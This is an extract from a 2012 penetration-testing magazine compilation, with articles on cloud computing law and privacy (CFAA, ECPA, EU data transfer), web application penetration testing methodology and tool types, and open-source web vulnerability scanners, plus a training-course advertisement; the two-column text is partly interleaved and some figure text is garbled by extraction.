then it should take care of HIPAA requirements. maintain public order or during pendency of a law suit
Similarly service provider providing Cloud Computing require companies to access the user data. On the
services to Credit Card Company should take care security front, encryption levels may differ from country
of the PCI DSS requirements. If you are handling to country. For example, India allows data encryption
Sensitive Personal data or Information under the only upto 40 bits though the world is considering
IT (Reasonable Security Practices and Procedures encryption beyond 256 bits. Hence, standard of
and Sensitive Personal data or Information) Rules, decryption would also need to be considered.
2011(India) then you need to take Reasonable
Security Practices and Procedures mentioned under Cloud computing and the judiciary
the said rules. It ensures the customers that in spite Ultimately this is the big question. Can the law wrap its
of using the Cloud Computing services their legal & head around cloud computing and can the evidence
regulatory requirements are being met. collected from the court be admissible in the court of
law and be used to incriminate someone. Also areas
Following issues needs to be addressed in cloud-legal to explore are contractual arrangements. Contracting
environment may be much more difficult in the cloud environment
than outsourcing, because the players may not be in a
• Customers / clients should have a very good position to make certain promises and additional duties/
understanding of the legal & regulatory requirements obligations may destroy the cheap pricing model for
applicable to their business. cloud computing. [Info-Sec Compliance]
• Customers should ensure that their legal &
regulatory requirements are being fulfilled even in Storm Clouds
the Cloud Computing scenario. In this section we look to identify the threats that the
• Service provider should also have a clear cloud environment faces from hackers, improper laws
understanding of the legal & regulatory requirements and policies, Government agencies and information
of their clients before offering their services. warfare.
• Service provider should make necessary provisions
to ensure that the legal & regulatory requirements U.S. Laws Criminalizing Harmful Activity in the Cloud
of their clients are being met. The laws and policies set by the government are just
• Customers should have transparency into the a patch work. There are only a few laws that regulate
certifications & processes being followed by this method of storing and sharing information.

THE BEST OF 01/2012 Page 174 http://pentestmag.com


Although various states have their own laws to deal computing tasks such as storing and processing large
with computer crimes, the foremost important law amounts of data. At that time, very few Americans had e-
regulating cloud computing in the USA is the federal mail accounts, and those who did typically downloaded
Computer Fraud & Abuse Act (CFAA). While this email from a server onto their hard drives, and email
law was not designed to govern cloud computing was automatically and regularly overwritten by service
but intended for other kinds of criminal activity on providers grappling with storage constraints.[J. Beckwith Burr, the
computers, several of its provisions can be applied to Electronic Communications Privacy Act of 1986: Principles for Reform]

harmful activity on the cloud. The part of ECPA that covers searches and
seizures on an electronic network is called the Stored
The Computer Fraud & Abuse Act Communications Act (SCA). According to the SCA,
Today, the Computer Fraud and Abuse Act (CFAA) there are two types of network providers:
is one of the principal tools for Combating computer
crime. The CFAA also can be applied to the cloud in Remote computing service (RCS)
the sense that the Act covers protected computers, An RCS is defined as the provision to the public of
which are defined as any computer system used in computer storage or processing services by means of
or affecting interstate or foreign commerce, as well electronic communication service.[18 U.S.C. § 2510(15)]
as any computer system of the federal government
or a financial institution. This can also be made to Electronic communication service (ECS)
include any computer or digital devise connected to the An ECS is any service which provides to users
Internet, even if it is located outside the United States. thereof the ability to send or receive wire or
Thus, servers anywhere in the world that host cloud electronic communications. Electronic storage is any
computing services or resources can be protected by temporary, intermediate storage of a wire or electronic
the Act. communication incidental to the electronic transmission
In addition, several provisions of the CFAA can be thereof, and any storage of such communication by
used to punish harmful activity in the cloud: Table 1. an [ECS] for purposes of backup protection of such
communication.
The Electronic Communications Privacy Act In terms of electronic storage, what is undisputedly
Passed in 1986, the Electronic Communications Privacy included are communications held by a service provider
Act (ECPA) sought to bring the constitutional and and not yet retrieved by a subscriber, such as an
statutory protections against wiretapping of telephonic unopened email.
communications into the computer age.[ECPA] ECPA was
written at a time when network computing was used for Cloud vs. Privacy
two primary purposes. First, network account holders Cloud computing has significant implications for
would use third-party network service providers to send the privacy of personal information as well as for
and receive communications, having the providers hold the confidentiality of business and governmental
the messages until delivery to the user’s computer. information. While storage of user data on remote
Second, account holders used third-parties to outsource servers is not a new activity, the current emphasis
Table 1. CFAA
No Section Description
1 Section 1030(a)(1) Prohibits obtaining or transmitting national security information from a computer.
2 Section 1030(a)(2) Prohibits intentionally gaining unauthorized access and obtaining information from a Computer
3 Section 1030(a)(3) Prohibits trespassing in a nonpublic government Computer
4 Section 1030(a)(4) Prohibits using one’s unauthorized access to a protected computer in order to defraud and thereby
obtain something of value
5 Section 1030(a)(5) Prohibits gaining unauthorized access and causing damage to a protected computer. This can include a
broad range of activities, such as: hacking into databases to delete or alter records; transmitting viruses
or worms that may delete �les, crash computers, or install malicious software; or �ooding a computer’s
Internet connection with junk data, preventing legitimate users from sending or receiving anything with
that computer
6 Section 1030(a)(6) Prohibits trafficking in passwords or similar information that could be used to gain unauthorized access
to a protected computer.
7 Section 1030(a)(7) Prohibits threatening to cause damage to a protected computer with the intent to extort.

THE BEST OF 01/2012 Page 175 http://pentestmag.com


WEB APP PENTESTING
on and expansion of cloud computing warrants a could be subject permanently to European Union
more careful look at the privacy and confidentiality privacy laws. Information in the cloud may have more
consequences. A user’s privacy and confidentiality than one legal location at the same time, with differing
risks vary significantly with the terms of service and legal consequences. A cloud provider may, without
privacy policy established by the cloud provider. Those notice to a user, move the user’s information from
risks may be magnified when the cloud provider has jurisdiction to jurisdiction, from provider to provider,
reserved the right to change its terms and policies or from machine to machine. The legal location of
at will. The secondary use of a cloud computing information placed in a cloud could be one or more
user’s information by the cloud provider may violate places of business of the cloud provider, the location
laws under which the information was collected of the computer on which the information is stored,
or are otherwise applicable to the original user. A the location of a communication that transmits the
cloud provider will also acquire transactional and information from user to provider and from provider
relationship information that may itself be revealing or to user, a location where the user has communicated
commercially valuable. or could communicate with the provider, and possibly
For some types of information and some categories other locations.
of cloud computing users, privacy and confidentiality Laws could oblige a cloud provider to examine
rights, obligations, and status may change when a user user records for evidence of criminal activity and
discloses information to a cloud provider. Procedural other matters. Some jurisdictions in the United States
or substantive barriers may prevent or limit the require computer technicians to report to police or
disclosure of some records to third parties, including prosecutors evidence of child pornography that they
cloud computing providers. For example, health record find when repairing or otherwise servicing computers.
privacy laws may require a formal agreement before To the extent that cloud computing places a diverse
any sharing of records is lawful. Other privacy laws may collection of user and business information in a single
flatly prohibit personal information sharing by some location, it may be tempting for governments to ask or
corporate or institutional users. Disclosure and remote require cloud providers to report on particular types of
storage may have adverse consequences for the criminal or offensive behavior or to monitor activities
legal status of or protections for personal or business of particular types of users (e.g. convicted sex
information. For example, a trade secret shared with a offenders). Other possibilities include searching for
cloud provider may lose some of its legal protections. missing children and for music or software copyright
When a person stores information with a third party violations. Legal uncertainties make it difficult to
(including a cloud computing provider), the information assess the status of information in the cloud as
may have fewer or weaker privacy protections than well as the privacy and confidentiality protections
when the information remains only in the possession of available to users. The law badly trails technology,
the person. Government agencies and private litigants and the application of old law to new technology can
may be able to obtain information from a third party be unpredictable. For example, current laws that
more easily than from the original owner or creator of protect electronic communications may or may not
the content. A cloud provider might even be compelled apply to cloud computing communications or they
to scan or search user records to look for fugitives, may apply differently to different aspects of cloud
missing children, copyright violations, and other computing.
information of interest to government or private parties. Responses to the privacy and confidentiality risks of
Remote storage may additionally undermine security or cloud Computing include better policies and practices
audit requirements. by cloud providers, changes to laws, and more
The location of information in the cloud may have vigilance by users. If the cloud computing industry
significant effects on the privacy and confidentiality would adopt better and clearer policies and practices,
protections of information and on the privacy obligations users would be better able to assess the privacy and
of those who process or store the information. Any confidentiality risks they face. Users might avoid cloud
information stored in the cloud eventually ends up on computing for some classes of information and might
a physical machine owned by a particular company be able to select a service that meets their privacy
or person located in a specific country. That stored and confidentiality needs for other categories of
information may be subject to the laws of the country information. For those risks that cannot be addressed
where the physical machine is located. For example, by changes in policies and practices, changes in laws
personal information that ends up maintained by a may be appropriate. Each user of a cloud provider
cloud provider in a European Union Member State should pay more – and indeed, close – attention to

THE BEST OF 01/2012 Page 176 http://pentestmag.com


the consequences of using a cloud provider and,
especially, to the provider’s terms of service.

Privacy Laws
Every sector has specific laws that deal with the data
they collect store and access. There are federal laws like
Gramm-Leach-Bliley (applicable to financial institutions),
HIPAA (applicable to health care providers and others
dealing with health information and related entities),
COPPA (applicable to data of children under 13 collected
online), and the USA Patriot Act (may be applicable to
foreign companies that work with cloud providers that
allow data to reside in or flow through the US).
By contrast, the European Union has a much more
comprehensive privacy law framework, the EU Data
Protection Directive. Each member state also has its
own unique law implementing the Directive. The most
notable thing about the EU Directive and member state
laws for purposes of cloud computing is this – in the
absence of specific compliance mechanisms, the EU
prohibits (yes, you read correctly, prohibits) the transfer
of personal information of EU residents out of the EU
to the US and the vast majority of countries around the
world. This means if you want to put data in the cloud
that includes personal information of EU residents (and
that might be something as simple as an email address
or employment information), and the data will flow from
the EU to almost anywhere in the world, you cannot
simply throw the data in the cloud and hope for the
best. You need to have, at a minimum International Safe
Harbor Certification, a model contracts which allow data
transfer from the EU to non-EU countries, (but do not
always work well with multi-tiered vendor relationships)
or Binding Corporate Rules which are designed for a
multinational company and therefore may not function
well for cloud provider relationships.

Incidents of Privacy breach in cloud

• The FBI’s Magic Lantern / Computer and Internet


Protocol Address Verifier (CIPAV)
• Mobile Phones as Roving Bugs
• In-Car Navigation Systems
• D. TorrentSpy
• Hushmail
• Skype in China

Silver Lining
However there is a hope and looking forward there
are certain suggestions I would like to make in order
to make clouds safer (secure), more private and better
governed.

THE BEST OF 01/2012


WEB APP PENTESTING
Self Regulatory Initiatives are repelled. The cloud model will continue to offer
These initiatives are to be taken by the cloud providers users state-of-the-art applications and infrastructures at
themselves like, Data export & portability, where there affordable prices, with the level of support that can rival
can be easy portability and exporting of data, backup in-house IT services. Vendors will inevitably come and
can be easily taken. Transparency in Geographic go and it will be imperative that users establish effective
location of data is also paramount so that the users SLA’s to ensure any of the vulnerabilities highlighted
know where their data resides and they can make an do not have a detrimental effect on their business or
informed decision as to what kind of data to be stored way of life in adverse situations. Hackers will continue
on the cloud. Transparency and choice for usage of to exploit the openness and ambiguity in the cloud
secondary data (targeted advertising, customized and the vulnerabilities will surface in time, as they
searches) along with Improved User Education and have done with all new technological milestones and
Awareness are key policies that need to be installed. it will be testament to those charged with dealing with
those vulnerabilities that will ensure the effects are not
Amendments to the Law catastrophic. Information warfare is a real time threats
ECPA Reforms, Data on the cloud should be brought to the clouds, and it is upon the cloud service providers
under the ambit of the Fourth amendment. Cloud to provide the first line of defense. Lawmakers and
Computing Advancement Act, Compensation for victims law enforcement agencies are stepping up to the task
increased penalties for hacking and malicious acts in and rapidly catching up to the diverse and technically
CFAA. Enforce log and data collection by cloud service challenging scenario of the cloud. Ultimately it’s upon
providers. business and the end users to be aware of the risks
Bilateral and unified treaties, Unified Data privacy and and demand better security and policy support to their
protection treaties Exchange of investigative information applications and data.
in case of multinational cyber crimes.

Conclusion
The long dreamed vision of computing as a utility is
finally emerging. The elasticity of a utility matches
the need of businesses providing services directly to
customers over the Internet, as workloads can grow
(and shrink) far faster than 20 years ago. It used to take
years to grow a business to several million customers –
now it can happen in months. From the cloud provider’s
view, the construction of very large datacenters at low
cost sites using commodity computing, storage, and ABHIJEET PARANDEKAR
networking uncovered the possibility of selling those
resources on a pay-as-you-go model below the costs SAGAR RAHURKAR
of many medium-sized datacenters, while making a Sagar Rahurkar is a Law graduate
profit by statistically multiplexing among a large group and a Certi�ed Fraud Examiner. He is
of customers. From the cloud user’s view, it would be a Senior Consultant at Asian School
as startling for a new software startup to build its own of Cyber Laws. He specializes in
datacenter as it would for a hardware startup to build Cyber Laws, Fraud Investigation and
its own fabrication line. In addition to startups, many Intellectual Property Law related issues.
other established organizations take advantage of He teaches various law enforcement
the elasticity of Cloud Computing regularly, including people, students and international delegates on Cyber
newspapers like the Washington Post, movie companies legal related issues. He is also a member of ASCL Computer
like Pixar, and universities like ours. Emergency Response Team. He regularly provides
Cloud computing is here to stay, yet the journey may consultancy to Corporates, Law Enforcement and Media.
take the model through some stormy waters. The concept He has presented his papers at various conferences like,
will undoubtedly alleviate many issues for countless CyberAttack, NULLCON, c0c0n, International Seminar on
users, yet it will inevitably attract the unscrupulous Cyber Laws organised by Delhi University, etc. He is a regular
like sharks to a feeding frenzy. How vendors deal contributor to various IT-Sec magazines, where he writes on
with this and who they involve in the process will have IT Law related issues. Sagar Rahurkar can be contacted at
significant impact on how those unscrupulous vultures contact@sagarrahurkar.com.

THE BEST OF 01/2012 Page 178 http://pentestmag.com


WEB APP PENTESTING

Web
Application Security and Penetration Testing

In the recent years, web applications have grown dramatically


within many organizations and businesses where such entities
became very independent on such technology as part of their
businesses’ lifecycle.

D
ynamic web applications usually use • Identification of Ports – In this process, ports are
technologies such as ASP, ASP.Net, PHP, scanned, and the associated services running are
Ajax, JSP, Perl, Cold Fusion, Flash, and etc. identified.
These applications expose financial data, customer • Software Services Analyzed – In this process, both
information, and other sensitive and confidential automated, and manual testing is conducted to
data that required authentication and authorization. discover weaknesses.
Ensuring that the web applications are secure is a • Verification of Vulnerabilities – This process helps
critical mission that businesses have to go through to verify that the vulnerabilities are real, where
achieve the desired security level of such applications. weakness might be exploited to help remediate the
With the accessibility of such critical data to the public issues.
domain, web application security testing also becomes • Remediation of Vulnerabilities – In this process,
paramount process for all the web applications that are the vulnerabilities will be resolved and such
exposed to the outside world. vulnerabilities will be re-tested to ensure they have
been addressed.
Introduction
Penetration testing (It is also called Pen Testing) is Part of the initiative of securing the web applications is
usually conducted by ethical hackers where the security to include the security development lifecycle as part of
team reviews application security vulnerabilities to the software development lifecycle where the number
discover potential security risks. Such process requires of security-related design and coding defects can be
a deep knowledge, experience in a variety of different reduced, and also the severity of any defects that
tools, and a range of exploits that can achieve the do remain undetected can be reduced or eliminated.
required tasks. Despite the fact that the above initiatives solve some
During the pen testing different web applications’ of the security problems, some of undiscovered
vulnerabilities are tested (e.g. Input Validation, Buffer defects will remain even in the most scrutinized web
Overflow, Cross Site Scripting, URL Manipulation, applications. Until scanners can harness true artificial
SQL Injection, Cookie Modification, Bypassing intelligence, and put the anomalies into context or
Authentication, and Code Execution). A typical pen make normative judgments about them, the struggle to
testing involves the following procedures: find certain vulnerabilities will exist.

THE BEST OF 01/2012 Page 180 http://pentestmag.com


Automated Scanning vs. Manual Penetration
Testing
A vulnerabilities assessment simply identifies and
reports vulnerabilities; whereas a pen testing attempts � �������������������
to exploit vulnerabilities to determine whether
unauthorized access to other malicious activities is
possible. By performing a pen testing to simulate an
attack, it’s possible to evaluate whether an application
has any potential vulnerabilities resulting from poor or
improper system configuration, hardware or software
flaws, or weaknesses in the perimeter defences
protecting the application.
With more than 75% of the attacks occurring
over the HTTP/S protocols, and more than 90% of
web applications containing some type of security
vulnerability, it is essential that organizations implement
strong measures to secure their web applications.
Most of these attacks occur on the front door of the
organization where the entire online community has an
access to these doors (i.e. port 80 and port 443). With
the complexity and the tremendous amount of sensitive
data exist within web applications, consumers not only
expect, but also demand security for this information.
That said; securing a web application goes far
beyond testing the application using automated
systems and tools or by using manual processes. The
security implementation begins in the conceptual phase
where the modeling of the security risk is introduced
by the application, and the countermeasures that
are required to be implemented. It is imperative that
the web application security should be thought of as
����������������������
another quality vector of every application that has to
be considered through every step of the application ����������������������
lifecycle. �����������������������������
Discovering web application vulnerabilities can be
performed through different processes:

• Automation process – where scanning tools or


static analysis tools will be used.
• Manual process – where penetration testing or
code review will be used. � ���������������������
Web application vulnerability types can be grouped ������
into two categories: �������������������������� ����������������
�������������������������� �������������������������
�������������� ������������������������������
Technical Vulnerabilities �������������� ����������������������������
Where such vulnerabilities can be examined through ������������������������������� ���������������������������������
the following tests: Cross-Site-Scripting, Injection ����������������������� ���������������������
Flaws and Buffer Overflow. Automated systems and ����������� �������������������������
����������������� ������������������
tools which analyze and test the web applications ��������������������������� ���������������������������
are much better equipped to test for technical �������������������� ���������������������������������
vulnerabilities than the manual penetration tests. While
automated testing and scanning tools may not be able ��������������������������

�������������������������������������������������������������������������
THE BEST OF 01/2012 �����������������������������������������
WEB APP PENTESTING
to address 100% of all the technical vulnerabilities, History has proven that software bugs, defects and
there is no reason to believe that such tools will logical flaws are consistently the primary cause of
achieve such goal in the near future. Current problems commonly exploited application software vulnerabilities,
facing the web application tools are the following: where it can lead to unauthorized access to the
client-side generated URLs, required JavaScript systems, networks and application information. It is
functions, application logout, transaction-based also proven that most of the security breaches occur
systems requiring specific user paths, automated form due to vulnerabilities within the web application layer
submission, one time passwords, and Infinite web (i.e. attacks using the HTTP/HTTPS protocol). In such
sites with random URL-based session IDs. attacks, traditional security mechanism such as firewalls
and IDS provide little or no protection against attacks on
Logical Vulnerabilities the web applications.
Where such vulnerabilities can manipulate the logic of Security analyses review the critical components of
the application to do tasks that were never intended a web-based portal, e-commerce application, or web
to be done. While both an automated scanning tool services platform. Part of the analyses work that can be
and skilled penetration tester can navigate through a done is to identify vulnerabilities inherent in the code of
web application, only the latter is able to understand the web application itself regardless of the technology
what the logic behind specific workflow or how the implemented, back-end database or web server used
application works in general. Understanding the logic by the application.
and the flow of an application allows the manual pen It’s imperative to point out that the web application
testing to subvert or overthrow the business logic penetration assessments should be designed based
where security vulnerabilities can be exposed. For upon defined threat-model. It should also be based upon
instance, an application might direct the user from the evaluation of the integration between components
point A to point B to Point C based on the logic flow (e.g. third party components and in-house built
implemented within the application, where point B components) and the overall deployment configuration
represents a security validation check. A manual that represents a solid choice for establishing a
review of the application might show that it is possible baseline security assessment. Application penetration
for attackers to manipulate the web application to go assessments server as a cost-effective mechanism to
directly from point A to point C, and bypassing the identify a set of vulnerabilities in a given application
security validation exists at point B. where it exposes the most likely exploit vulnerabilities,

�������������
��������������������
����������������
��������������
��������������������������
����������������� ��������������������������
�����������������������

�������� ��������������

����������� �������� ���������� ������������������

��������

����������������

��������������

Figure 1. The different activities of the Pen Testing processes

THE BEST OF 01/2012 Page 182 http://pentestmag.com


and allow to find similar instances of vulnerabilities environment, and the expected knowledge gain will
throughout the code. be based on information that can be found out in
the public domain. This type of test is designed to
How Web Application Pen Testing Works? provide the most realistic penetration test possible
Most of the web applications’ penetration testing is since in many cases attackers start with no real
carried out from security operations centers where knowledge of the target systems.
the access to the resources under test will be • Partial Knowledge Test (Gray Box) – In such ap-
remotely over the Internet using different penetration proach a partial gain of knowledge about the
technologies. At the end of such test, the application environment under testing will be achieved before
penetration test provides a comprehensive security conducting the test.
assessment for various types of applications (e.g. • Source Code Analysis (White Box) – In such
commercial enterprise web applications, internally ap-proach the penetration test team has fill
developed applications, web-based portal, and e- information about the application and its source
commerce application). Figure-1 describes some of code. In such test the security team will do a code
the activities that usually happen during the pen testing review (line-by-line) in attempt to find any flaws
process. Some of the testing processes that are used that could allow attackers to take control of the
to achieve the security vulnerabilities assessment application, perform a denial of service attack
such as Application Spidering, Authentication Testing, against it, or use such flaws to gain access to the
Session Management Testing, Data Validation internal network.
Testing, Web Service Testing, Ajax Testing, Business
Logic Testing, Risk Assessment, and Reporting. It’s also important to point out that penetration testing
In conducting the web penetration testing, different can be achieved through two different types of testing:
approaches can be used to achieve the security
vulnerabilities assessment, some of these approaches • External Penetration Testing
are: • Internal Penetration Testing

• Zero-Knowledge Test (Black Box) – In such ap- Both types of testing can be conducted with least
proach, the application security testing team will information (black box) and also can be conducted
not have any of inside information about the target with limited information (white box).

Figure 2. The different phases of the Pen Testing

THE BEST OF 01/2012 Page 183 http://pentestmag.com


WEB APP PENTESTING
Figure-3 shows different procedures and steps that closing the discovered vulnerabilities within the
can be used to conduct the penetration testing. The systems and the web applications.
following are the description of these steps:
Web Applications Testing Tools
• Scope and Plan – In this step, the scope of the Through the Pen testing, a specific structure
penetration testing is identified, and the project plan methodology has to be followed where the following
and resources will be defined. steps might be used: Enumeration, Vulnerabilities
• System Scan and Probe – In this step, the system Assessment and Exploitation. Some of the tools that
scanning under the defined scope of the project might be used within these steps are:
will be conducted where the automated scanners
will examine the open ports, scanning the system • Port Scanners
to detect vulnerabilities, and hostnames, and IP • Sniffers
addresses previously collected will be used at this • Proxy Servers
stage. • Site Crawlers
• Creating of Attack Strategies – In this step, the • Manual Inspection
testers prioritize the systems and the attack
methods will be used based on the type of the The output from the above tools will allow the security
system, and how critical these systems. Also, team to gather information about the environment such
in this stage the penetration testing tools will be as: Open ports, Services, Versions, and Operating
selected based on the vulnerabilities detected from Systems. The vulnerabilities assessment utilizes the
the previous phase. data gathered in the previous step to uncover potential
• Penetration Testing – In this step, the exploitation vulnerabilities in the web server(s), application
of vulnerabilities using the automated tools will be server (s), database server (s) and any intermediary
conducted where the attacking methods designed devices such as firewalls and load-balancers. It’s
in the previous phase will be used to conduct also important for the security team not to rely solely
the following tests: data & service pilferage test, on the tools during the assessment phase to discover
buffer overflow, privilege escalation, and denial of vulnerabilities, manual inspection for items such as
services (if applicable). HTTP responses, hidden fields, and HTML page
• Documentation – In this step, all the vulnerabilities sources should be part of the security assessment as
discovered during the test are documented, well.
evidence of exploitation and penetration testing Some of the areas that can be covered during the
findings are also recommended to be presented vulnerabilities assessment are the following:
later within the final report.
• Improvement – The final step of the penetration • Input validation
testing is to provide the corrective actions on • Access Control

Figure 3. Testing techniques, procedures and steps

THE BEST OF 01/2012 Page 184 http://pentestmag.com


• Authentication and Session Management (Session attempt to exercise vulnerabilities on their targeted
ID flaws) Vulnerabilities systems. The main goal of the vulnerability scanners
• Cross Site Scripting (XSS) Vulnerabilities is to provide an essential means of meticulously
• Buffer Overflows examining each and every available network service
• Injection Flaws on the targeted hosts. These scanners work from a
• Error Handling database of documented network service security
• Insecure Storage defects, and exercising each defect on each available
• Denial of Service (if required) service of the target hosts. Most of the commercial and
• Configuration Management the open source scanners scan the operating system
• Business logic flaws for known weaknesses and un-patched software, as
• SQL Injection faults well as configuration problems such as user permission
• Cookie manipulation and poising management defects, or problem with file access
• Privilege escalation controls. Despite the fact that both network-based and
• Command injection host-based vulnerability scanners do little to help web
• Client side and header manipulation application-level penetration test, they are fundamental
• Unintended information disclosure tools for any penetration testing. Good examples for
such tools are: Internet Scanners, QualysGuard, or
During the assessment, testing the above vulnerabilities Core Impact.
is performed except those that could cause a Denial of
Service conditions, and usually discussed beforehand. Application Scanners
Possible options of Denial of Service testing include Most of the application scanners can observe the
testing during a specific time, testing a development functional behaviour of an application, and then attempt
system or manually verifying the condition that a sequence of common attacks against the application.
may be responsible for the vulnerability. Once the Popular commercial application scanners include
vulnerabilities assessment is complete, the final reports, Appscan, and WebInspect.
recommendations and comments are summarized, and
better solutions are suggested for the implementation Web application Assessment Proxy
process. Once the above assessments are done, Assessment proxies work by interposing themselves
the penetration test is half-way done, and the most between the web browsers used by the testers and
important part of the assessment has to be delivered the target web server where data can be viewed
which is the informative report that’s highlights all the and manipulated. Such flexibility adds different tricks
risks found during the penetration phase. to exercise the application’s weaknesses, and its
The following are some of the commonly used tools associated components. For example, the penetration
for traditional penetration testing: testers can view all cookies, hidden HTML fields and
other data used by the web application, and attempt to
Port Scanners manipulate their values to trick the application.
Such tools are used to gather information about which The above penetration testing practice called a black
network services are available for connection on each box testing. Some organizations use hybrid approaches
target host. The port scanning tools usually examines where the traditional penetration testing along with some
or questions each of the designated network ports or level of source code analysis of the web application is
service on the target system. Most of these tools are able used. Most of the penetration testing tools can perform
to scan both TCP as well as UDP ports. Another common the penetration testing practices, however choosing the
feature of port scanners is their ability to examine the right tool for the job is something vital for the success of
operating system type, and its version number since the penetration process, and the accurate results.
protocol such as TCP/IP implementation can vary in The following are some of the common features that
their specific responses. The configuration flexibility in should be implemented within the penetration testing
the port scanners serve examining the different port tools:
configuration, as well as employ the ability to hide from
the network intrusion detection mechanisms. • Visibility – The tool must provide the required
visibility for the testing team that can be used as a
Vulnerability Scanners feedback, and reporting feature of the test results.
While port scanners only produce an inventory of the • Extensibility – The tool can be customized, and
types of available services, the vulnerability scanners it must provide scripting language or plug-in

THE BEST OF 01/2012 Page 185 http://pentestmag.com


WEB APP PENTESTING
capabilities that can be used to construct cust- a weakness or vulnerabilities in the system subjected
omized the penetration testing. to the assessment. Penetration testing includes all
• Configurability – Having the tool that can be of the process in vulnerabilities assessment plus the
configurable is highly recommended to ensure the exploitation of vulnerabilities found in the discovery
flexibility of the implementation process. phase.
• Documentation – The tool should provide the right Unfortunately, an all clear result from a penetration
documentation that can provide clear explanation test doesn’t mean that an application has no problems.
for the probes performed during the penetration Penetration tests can miss weakness such as session
testing. forging and brute-forcing detection, and as such;
• License Flexibility – The tool that has the flexibility implementing security throughout an application’s
of use without specific constraints such as a lifecycle is imperative process for building secure web
particular IP range of numbers, and license limits is applications.
a better tool than others. As automated web application security tools have
matured in the recent years, and over time, automated
Security Techniques for Web Apps security assessment will continue to both reduce any
Some of the security techniques that can be uncertainty of determination (i.e. false positive results),
implemented within the web application to eliminate and the potential to miss some issues (i.e. false
vulnerabilities are: negatives results).
Both automated and manual penetration testing
• Sanitize the data coming from the browser – Any can be used to discover critical security vulnerabilities
data that is sent by the browser can never be in web applications. Currently the automated tools
trusted (e.g. submitted form data, uploaded files, can’t be entirely used as a replacement of the manual
cookies data, XML, etc.). If web developers fail to penetration test. However, if the automated tools
sanitize the incoming data from unwanted data, it are used correctly, organizations can save a lot of
might lead to vulnerabilities such as SQL injection, money and time in finding broad range of technical
cross site scripting, and other attacks against the security vulnerabilities in web applications. The manual
web application. penetration testing can be used to augment the results
• Validate data before form submission, and manage of the logical vulnerabilities found as a result of using
sessions – To avoid Cross Site Request Forgery the automated testing.
(CSRF) that can occur when a web application Finally, it is important to point out that over time, the
accepts form submission data without verifying if manual testing for technical vulnerabilities will increase
it came from a user web form. It is imperative for from difficult to impossible as web applications size, and
the web application to verify that the user form is the scope of such applications, and their complexity
the one that the web application had produced and increase. The fact that many enterprise organizations
served. will not be able to dedicate the time, money, and the effort
• Configure the server in the best possible way required to assess the thousands of web applications,
– network administrators have to follow some will increase the chances of using the automated tools
guidelines for hardening the web servers. Some of rather than using the human factor to manually testing
these guidelines are: Maintain and update proper these applications. Also, relying on human efforts to test
security patches, kill all the redundant services and for thousands of technical vulnerabilities within these
shutdown unnecessary ports, confine access rights applications is subject to the human errors, and simply
to folders and files, employ SSH (Secure Shell can’t be trusted.
network protocol) rather than using telnet or FTP,
and install efficient anti-malware software.

In addition to the above guidelines, it is always


important to implement strong passwords for the web
applications users, and cleaning stored passwords. BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working
Conclusion with Ontario Provincial Government of Canada. He has over
A vulnerability assessment is the process of identifying, twenty years of Information Technology experience with
prioritizing, quantifying, and ranking the vulnerabilities Bachelor degree in Engineering, bachelor degree in Computer
in a system where such process determines if there is Science, and Master degree in Computer Science.

THE BEST OF 01/2012 Page 186 http://pentestmag.com


ITOnlinelearning offers Network Security courses for the beginner through to the professional.
From the CompTIA Security+ through to CISSP, Cer�fied Ethical Hacker (CEH),
Cer�fied Hacking Forensic Inves�gator (CHFI) and Security Analyst/Licensed Penetra�on tester (ECSA/LPT).

Tailored Advice and Discounts


0800-160-1161 or
Please Call one of our Course Advisors for help and Tailored Advice -during office hours
(Mon-Fri 9am-5.30pm)

Telephone: 0800-160-1161
Interna�onal: +44 1795 436969
Email: sales@itonlinelearning.co.uk
support@itonlinelearning.co.uk
Registered Office: 16 Rose Walk, Si�ngbourne, Kent, ME10 4EW
WEB APP PENTESTING

Open Source
Web Application Security Testing Tools

Needless to say that with cybercrime is on the rise and with the
immense rise in online security threats no business owner should
overlook their website’s security and this is exactly where the
concept of web application security testing tools have gained
immense significance.

I
n fact more than four out of every five businesses There are some powerful and free web application
have experienced a data breach still not all business security testing tools which can help you to identify any
website owners are aware of website security possible holes. In this article we will explore the choice
threats or how vulnerable their website is without of tools available.
the necessary protection. And this is where free web
application security testing tools comes in. Introduction
It goes without saying, websites are vulnerable to online One of the prominent Information Security consultant
security threat and if a website’s server and applications and researcher, Shay Chen has conducted some
are not protected from security vulnerabilities, identities, extensive testing using these tools and has published
credit card information, all billions of dollars are at risk. a benchmarking report in http://sectooladdict.blogspot.c
Quite ideally therefore cost effective security measures om/2011/08/commercial-web-application-scanner.html
needs to be taken, which might entail moving away from using the project WAVSEP.
proprietary client/server applications to web applications Shay Chen’s Project WAVSEP consists of an
which are not only cheap but at the same time provides evaluation platform which aids in the comparison
an extensive delivery platform. of 60 Commercial & Open Source Black Box Web
In fact, impact of an attack on websites can actually Application Vulnerability Scanners. This evaluation
cause costly and embarrassing disruptions in a platform contains a collection of unique vulnerable web
company’s services. And without employing the web pages that can be used to test the various properties
security testing tools business can incur loss. Attackers of web application scanners. This research is only
are lurking everywhere and they are well aware in fact valid for estimating the detection accuracy of SQLi &
aware of the Web application vulnerabilities. Also, their RXSS exposures, and for counting and comparing the
attempts to get at it are thoroughly assisted by several various features of the tested tools. Shay Chen did not
important factors. It is the right time to protect your evaluate every possible feature of each product, only
website with website security audit and with thorough the categories tested within the research.
website security test. A web security testing service will The assessment criterion of detecting the accuracy
in fact make sure that the company is fully compliant of SQL Injection is one of the most famous exposures
with rules and regulations, and is able to respond and the most commonly implemented attack vector in
quickly to any attacks. web application scanners. This because a scanner that

THE BEST OF 01/2012 Page 188 http://pentestmag.com


is not accurate enough will miss many exposures, and vulnerabilities. A combination of multiple technologies is
classify non-vulnerable entry points as vulnerable. The used to perform the tests. This software is constantly
test aimed to assess how good each tool is at detecting reviewed and updated by experts who have hands
SQL Injection exposures in a supported input vector, on experience in Web security testing and research.
which is located in a known entry point, without any Therefore WebSecurify promises to be a reliable
restrictions that can prevent the tool from operating solution to find the loopholes related to Web security.
properly. WebSecurify has the following remarkable features:
The evaluation was performed on an application that
uses MySQL 5.5.x as its data repository, and thus, will Test Result generation
reflect the detection accuracy of the tool when scanning WebSecurify is capable of generating test results at any
similar data repositories. level of detail. Also the test results can be obtained in
any localized language/ format. Customization options
The SQL Injection Detection Accuracy are available to decide the level of detail and other
Benchmark Results features of the report.
The next assessment criterion was the detection
accuracy of Reflected Cross Site Scripting. This is a Intuiveness
common exposure which is the second most commonly The application is intuitive enough to find the common
implemented feature in web application scanners. flaws by itself. Some such vulnerabilities include, SQL
The Reflected XSS Detection Accuracy Benchmark Injection, Cross Site Scripting, Cross Site Requests
Results. Forgery, session security and information leakage
